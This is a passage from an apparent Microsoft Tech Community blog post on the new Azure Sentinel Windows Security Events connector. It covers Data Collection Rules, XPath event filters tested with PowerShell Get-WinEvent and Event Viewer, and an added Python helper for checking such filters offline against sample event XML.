(AMA)</SPAN></STRONG><SPAN data-contrast="auto">.</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">In your Azure Sentinel data connector's view, you can now see both connectors:</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_0-1624563350650.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291049iBC204BCF054B965A/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_0-1624563350650.png" alt="Cyb3rWard0g_0-1624563350650.png" /></span></P> <P>&nbsp;</P> <H2><SPAN data-contrast="none">A New Version?&nbsp;What is New?</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></H2> <H3>&nbsp;</H3> <H3><SPAN data-contrast="none">Data Connector&nbsp;Deployment</SPAN><SPAN data-contrast="auto">&nbsp;</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></H3> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Besides using the Log Analytics Agent&nbsp;to collect and&nbsp;ship events, the&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">old&nbsp;connector</SPAN></STRONG><SPAN data-contrast="auto">&nbsp;uses the&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Data Sources</SPAN></A><SPAN data-contrast="auto">&nbsp;resource&nbsp;from the&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Log Analytics Workspace</SPAN></A><SPAN data-contrast="auto">&nbsp;resource&nbsp;to set the 
collection tier of Windows security events.</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_1-1624563350661.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291050i6B0B34224AC3FD06/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_1-1624563350661.png" alt="Cyb3rWard0g_1-1624563350661.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-contrast="none">The </SPAN><STRONG><SPAN data-contrast="none">new connector</SPAN></STRONG><SPAN data-contrast="none">, on the other hand, uses a combination of </SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Data Collection Rules (DCR)</SPAN></A><SPAN data-contrast="none"> and </SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Data Collection Rule Associations (DCRA)</SPAN></A><SPAN data-contrast="none">. 
DCRs&nbsp;define&nbsp;what data to collect and where it should be sent.&nbsp;Here is where we can set it to send data to the log analytics workspace backing up our&nbsp;</SPAN><STRONG><SPAN data-contrast="none">Azure Sentinel</SPAN></STRONG><SPAN data-contrast="none">&nbsp;instance.</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_2-1624563350663.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291051iF978EEBE3595B7DC/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_2-1624563350663.png" alt="Cyb3rWard0g_2-1624563350663.png" /></span></P> <P>&nbsp;</P> <P><SPAN>&nbsp;</SPAN><SPAN><BR /></SPAN><SPAN data-contrast="none">In order to apply a DCR to a virtual machine, one needs to create an association&nbsp;between the machine and the rule.&nbsp;A virtual machine may have an association&nbsp;with&nbsp;multiple DCRs, and a DCR may have multiple virtual machines associated&nbsp;with&nbsp;it.</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_3-1624563350658.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291053i9B3AE8FBDE7E1789/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_3-1624563350658.png" alt="Cyb3rWard0g_3-1624563350658.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">For 
more&nbsp;detailed&nbsp;information about setting up the Windows Security Events connector with both Log Analytics Agent and Azure Monitor Agents <STRONG>manually</STRONG>, take a look at&nbsp;&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">this document</SPAN></A><SPAN data-contrast="auto">.</SPAN><SPAN><BR /></SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <H3><SPAN data-contrast="none">Data Collection&nbsp;Filtering Capabilities</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></H3> <P>&nbsp;</P> <P><SPAN data-contrast="auto">The&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">old connector</SPAN></STRONG><SPAN data-contrast="auto">&nbsp;is not flexible enough to choose&nbsp;what&nbsp;specific events to collect. For example, these are the only options to collect data from Windows machines with the old connector:</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="41" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><STRONG><SPAN data-contrast="auto">All events</SPAN></STRONG><SPAN data-contrast="auto">&nbsp;- All Windows security and AppLocker events.</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="41" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><STRONG><SPAN data-contrast="auto">Common</SPAN></STRONG><SPAN data-contrast="auto">&nbsp;- A standard set of events for auditing purposes.&nbsp;The Common event set may contain some types of events that aren't so common. 
This is because the main point of the Common set is to reduce the volume of events to a more manageable level, while still maintaining full audit trail capability.</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="41" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><STRONG><SPAN data-contrast="auto">Minimal</SPAN></STRONG><SPAN data-contrast="auto">&nbsp;- A small set of events that might indicate potential threats. This set does not contain a full audit trail. It covers only events that might indicate a successful breach, and other important events that have very low rates of occurrence.&nbsp;</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="41" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><STRONG><SPAN data-contrast="auto">None</SPAN></STRONG><SPAN data-contrast="auto">&nbsp;- No security or AppLocker events. 
(This setting is used to disable the connector.)</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> <P><SPAN data-contrast="auto">According to&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Microsoft docs</SPAN></A><SPAN data-contrast="auto">, these are the&nbsp;pre-defined&nbsp;security&nbsp;event&nbsp;collection&nbsp;groups depending on the tier set:</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_4-1624563350652.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291052iC2BEBDCEB748311A/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_4-1624563350652.png" alt="Cyb3rWard0g_4-1624563350652.png" /></span></P> <P><SPAN>&nbsp;</SPAN><SPAN><BR /></SPAN><SPAN data-contrast="auto">On the other hand, the&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">new connector</SPAN></STRONG><SPAN data-contrast="auto">&nbsp;allows custom&nbsp;data collection&nbsp;via <STRONG>XPath queries</STRONG>.&nbsp;These <STRONG>XPath queries</STRONG> are defined during the creation of the data collection rule&nbsp;and are&nbsp;written in the form&nbsp;of&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">LogName!XPathQuery</SPAN></STRONG><SPAN data-contrast="auto">.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;Here are a few examples:</SPAN></P> <P>&nbsp;</P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="39" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><SPAN data-contrast="auto">Collect only Security events with Event ID = 4624</SPAN><SPAN 
data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> <PRE>Security!*[System[(EventID=4624)]]</PRE> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="39" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="auto">Collect only Security events with Event ID = 4624 or Security events with Event ID = 4688</SPAN></LI> </UL> <PRE>Security!*[System[(EventID=4624 or EventID=4688)]]</PRE> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="37" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><SPAN data-contrast="auto">Collect only Security events with Event ID = 4688 and with a process name of consent.exe (note the straight quotes around the values; XPath does not accept typographic quotes)</SPAN></LI> </UL> <PRE>Security!*[System[(EventID=4688)]] and *[EventData[Data[@Name='ProcessName']='C:\Windows\System32\consent.exe']]</PRE> <P>&nbsp;</P> <P>Select the <STRONG>Custom</STRONG> option to choose which events to stream:</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_5-1624563350659.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291054i880C763609ED9DF3/image-size/large?v=v2&amp;px=999" 
role="button" title="Cyb3rWard0g_5-1624563350659.png" alt="Cyb3rWard0g_5-1624563350659.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <H3 aria-level="2"><SPAN data-contrast="none">Important!</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H3> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Based on&nbsp;the&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">new&nbsp;connector&nbsp;docs</SPAN></A><SPAN data-contrast="auto">, make sure to query only Windows Security and AppLocker logs. Events from other Windows logs, or from security logs from other environments, may not adhere to the Windows Security Events schema and&nbsp;won’t&nbsp;be parsed properly, in which case they won’t be ingested to your workspace.</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">Also,&nbsp;the Azure Monitor agent supports XPath queries for XPath version 1.0 only. I recommend reading the&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Xpath 1.0 Limitation documentation</SPAN></A><SPAN data-contrast="auto">&nbsp;before writing XPath Queries.</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <H2 aria-level="1"><SPAN data-contrast="none">XPath?</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H2> <P>&nbsp;</P> <P><SPAN data-contrast="auto">XPath stands for XML&nbsp;(Extensible Markup&nbsp;Language)&nbsp;Path&nbsp;language,&nbsp;and&nbsp;it&nbsp;is used to explore and model XML documents as a tree of nodes. 
Nodes&nbsp;can be represented as <STRONG>elements</STRONG>, <STRONG>attributes</STRONG>,&nbsp;and <STRONG>text</STRONG>.&nbsp;</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">In the image below, we can see a few node examples in&nbsp;the&nbsp;XML representation of a Windows security&nbsp;event:</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_6-1624563350669.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291057iA84CA44228260CCC/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_6-1624563350669.png" alt="Cyb3rWard0g_6-1624563350669.png" /></span></P> <P>&nbsp;</P> <H2><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">XPath Queries?</SPAN><SPAN>&nbsp;<BR /></SPAN></H2> <P>&nbsp;</P> <P><SPAN data-contrast="auto">XPath queries are used to search for&nbsp;patterns&nbsp;in&nbsp;XML documents and&nbsp;leverage&nbsp;path expressions and&nbsp;predicates to&nbsp;find a node or filter&nbsp;specific nodes&nbsp;that contain a specific value.&nbsp;Wildcards such as ‘<STRONG>*</STRONG>’ and ‘<STRONG>@</STRONG>’ are used to select nodes and predicates are always embedded in square brackets&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">“[]”.</SPAN></STRONG><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P aria-level="2">&nbsp;</P> <H3 aria-level="2"><SPAN data-contrast="none">Matching&nbsp;any element node&nbsp;with ‘*’</SPAN></H3> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Using our&nbsp;previous&nbsp;Windows Security event XML example, we can&nbsp;process Windows Security events&nbsp;using&nbsp;the wildcard ‘<STRONG>*</STRONG>’&nbsp;at the `Element`&nbsp;node&nbsp;level.</SPAN></P> <P><SPAN 
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">The&nbsp;example below walks through&nbsp;two&nbsp;‘<STRONG>Element</STRONG>’&nbsp;nodes to get to the&nbsp;‘<STRONG>Text</STRONG>’ node of value&nbsp;‘4688’.</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_7-1624563350628.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291056i467F07A87C900F2D/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_7-1624563350628.png" alt="Cyb3rWard0g_7-1624563350628.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">You can test this basic ‘<STRONG>XPath</STRONG>’ query via PowerShell.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="35" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="auto">Open a PowerShell console as ‘Administrator’.</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="35" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="auto">Use the&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Get-WinEvent</SPAN></A><SPAN data-contrast="auto">&nbsp;command to pass the XPath query.</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="35" aria-setsize="-1" data-aria-posinset="1" 
data-aria-level="1"><SPAN data-contrast="auto">Use the ‘LogName’ parameter to define which event channel to run the query against.</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="35" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="auto">Use the ‘FilterXPath’ parameter to set the XPath query.</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <PRE><SPAN data-contrast="auto">Get-WinEvent -LogName Security -FilterXPath '*[System[EventID=4688]]'</SPAN><SPAN><BR /></SPAN></PRE> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_8-1624563350630.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291055i55FC76B00062BB27/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_8-1624563350630.png" alt="Cyb3rWard0g_8-1624563350630.png" /></span></P> <P>&nbsp;</P> <H3 aria-level="2"><SPAN data-contrast="none">Matching&nbsp;any attribute node&nbsp;with ‘@’</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H3> <P>&nbsp;</P> <P><SPAN data-contrast="auto">As shown before, ‘<STRONG>Element</STRONG>’ nodes can contain ‘<STRONG>Attributes</STRONG>’ and we can use the wildcard ‘<STRONG>@</STRONG>’ to&nbsp;search for ‘<STRONG>Text</STRONG>’ nodes at the ‘<STRONG>Attribute</STRONG>’ node level.&nbsp;</SPAN><SPAN data-contrast="auto">The example below extends the previous one and&nbsp;adds a filter to search for&nbsp;a specific 
‘<STRONG>Attribute</STRONG>’ node that contains the&nbsp;following text: ‘<STRONG>C:\Windows\System32\cmd.exe</STRONG>’.</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_9-1624563350632.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291058iE40EC29B9B3E793E/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_9-1624563350632.png" alt="Cyb3rWard0g_9-1624563350632.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Once again, you can test the XPath query via PowerShell as Administrator.</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <PRE><SPAN data-contrast="auto">$XPathQuery = "*[System[EventID=4688]] and *[EventData[Data[@Name='ParentProcessName']='C:\Windows\System32\cmd.exe']]"</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">Get-WinEvent -LogName Security -FilterXPath $XPathQuery</SPAN><SPAN><BR /></SPAN></PRE> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_10-1624563350633.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291059i7B045F7777842584/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_10-1624563350633.png" alt="Cyb3rWard0g_10-1624563350633.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <H2 aria-level="1"><SPAN data-contrast="none">Can I Use XPath Queries in Event Viewer?</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H2> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Every time you add a filter through the Event Viewer UI, you 
can also get to the XPath query representation of the filter.&nbsp;The&nbsp;XPath query is part of&nbsp;a&nbsp;<STRONG>QueryList</STRONG>&nbsp;node&nbsp;which allows you to&nbsp;define and run&nbsp;multiple queries&nbsp;at once.</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_11-1624563350665.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291060iD5C2AFD5E98C44A2/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_11-1624563350665.png" alt="Cyb3rWard0g_11-1624563350665.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">We can take our previous example where we searched for a&nbsp;specific&nbsp;attribute and run it through the Event Viewer Filter XML UI.</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN>&nbsp;</SPAN></P> <PRE><SPAN data-contrast="auto">&lt;QueryList&gt;</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp; &lt;Query Id="0" Path="Security"&gt;</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp; &lt;Select Path="Security"&gt;*[System[(EventID=4688)]] and *[EventData[Data[@Name='ParentProcessName']='C:\Windows\System32\cmd.exe']]&lt;/Select&gt;</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp; &lt;/Query&gt;</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&lt;/QueryList&gt;</SPAN><SPAN><BR /></SPAN></PRE> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_12-1624563350667.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291063iBD3C6F0F0A81E511/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_12-1624563350667.png" alt="Cyb3rWard0g_12-1624563350667.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Now 
that we have covered some of the main changes and features of the new version of the Windows Security Events data connector, it is time to show you how to create a lab environment for you to test your own XPath queries&nbsp;for research purposes and&nbsp;before&nbsp;pushing them&nbsp;to&nbsp;production.</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <H2 aria-level="1">&nbsp;</H2> <H2 aria-level="1"><SPAN data-contrast="none">Deploy Lab Environment</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}"><BR /></SPAN></H2> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="45" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="auto">Identify the&nbsp;right Azure&nbsp;resources to&nbsp;deploy.</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="45" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><SPAN data-contrast="auto">Create deployment&nbsp;template.</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="45" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><SPAN data-contrast="auto">Run deployment template.</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> <H3><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">Identify&nbsp;the Right&nbsp;Azure Resources&nbsp;to&nbsp;Deploy</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></H3> <P>&nbsp;</P> 
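<P>Before moving on to the Azure resources, here is an added offline check for the <STRONG>LogName!XPathQuery</STRONG> strings and the PowerShell tests covered above. It is example code written for this post, not part of the original article or of Azure-Sentinel2Go. It splits each query into log name and XPath, rejects logs other than Security and AppLocker (the restriction from the “Important!” note), and evaluates the two clause shapes used above (an EventID filter under <STRONG>System</STRONG> and a <STRONG>Data[@Name=...]</STRONG> filter under <STRONG>EventData</STRONG>) against a few constructed Windows event XML records. It is not an XPath 1.0 engine; the sample events, record IDs and helper names are assumptions made up for the example, and <STRONG>Get-WinEvent</STRONG> on a real host remains the authoritative test.</P>

```python
"""Offline sanity check for DCR-style 'LogName!XPath' filters (added example).

Understands only the XPath subset used in the post, joined by ' and ':
    *[System[(EventID=4624 or EventID=4688)]]
    *[EventData[Data[@Name='ParentProcessName']='C:\\Windows\\System32\\cmd.exe']]
"""
import re
import xml.etree.ElementTree as ET

# Default namespace of Windows event XML (visible in Event Viewer's XML view).
# Get-WinEvent -FilterXPath resolves unprefixed names against it for you; a
# generic XML library does not, so every path below carries the 'e:' prefix.
EVENT_NS = "http://schemas.microsoft.com/win/2004/08/events/event"
NS = {"e": EVENT_NS}

# Per the connector docs, only Security and AppLocker logs parse correctly.
ALLOWED_LOG_PREFIXES = ("Security", "Microsoft-Windows-AppLocker/")

SYSTEM_RE = re.compile(r"^\*\[System\[\(?(.*?)\)?\]\]$")
EVENTDATA_RE = re.compile(r"^\*\[EventData\[Data\[@Name='([^']+)'\]='([^']+)'\]\]$")


def split_dcr_query(query):
    """Split 'LogName!XPath' and reject logs the connector will not parse."""
    if "!" not in query:
        raise ValueError(f"missing '!' separator in {query!r}")
    log_name, xpath = query.split("!", 1)
    if not log_name.startswith(ALLOWED_LOG_PREFIXES):
        raise ValueError(f"log {log_name!r} is not a Security or AppLocker log")
    return log_name, xpath


def parse_xpath(xpath):
    """Parse the subset into ('event_id', {ids}) / ('data', (name, value)) predicates."""
    predicates = []
    for clause in xpath.split(" and "):  # values containing ' and ' are out of scope
        clause = clause.strip()
        m = SYSTEM_RE.match(clause)
        if m:
            ids = set()
            for term in m.group(1).split(" or "):
                name, _, value = term.strip().partition("=")
                if name != "EventID" or not value.isdigit():
                    raise ValueError(f"unsupported System predicate {term!r}")
                ids.add(int(value))
            predicates.append(("event_id", ids))
            continue
        m = EVENTDATA_RE.match(clause)
        if m:
            predicates.append(("data", (m.group(1), m.group(2))))
            continue
        raise ValueError(f"unsupported clause {clause!r}")
    return predicates


def event_matches(event, predicates):
    """Every predicate must hold, mirroring the ' and ' in the query."""
    for kind, payload in predicates:
        if kind == "event_id":
            node = event.find("e:System/e:EventID", NS)
            if node is None or int(node.text) not in payload:
                return False
        else:
            name, expected = payload
            node = event.find(f"e:EventData/e:Data[@Name='{name}']", NS)
            if node is None or node.text != expected:
                return False
    return True


def filter_events(query, events_xml):
    """Return the EventRecordIDs of the events the DCR query would collect."""
    _, xpath = split_dcr_query(query)
    predicates = parse_xpath(xpath)
    hits = []
    for xml_text in events_xml:
        event = ET.fromstring(xml_text)
        if event_matches(event, predicates):
            hits.append(int(event.find("e:System/e:EventRecordID", NS).text))
    return hits


def _sample(record_id, event_id, data):
    """Build a minimal constructed event; real events carry many more fields."""
    fields = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in data.items())
    return (f'<Event xmlns="{EVENT_NS}"><System><EventID>{event_id}</EventID>'
            f'<EventRecordID>{record_id}</EventRecordID></System>'
            f'<EventData>{fields}</EventData></Event>')


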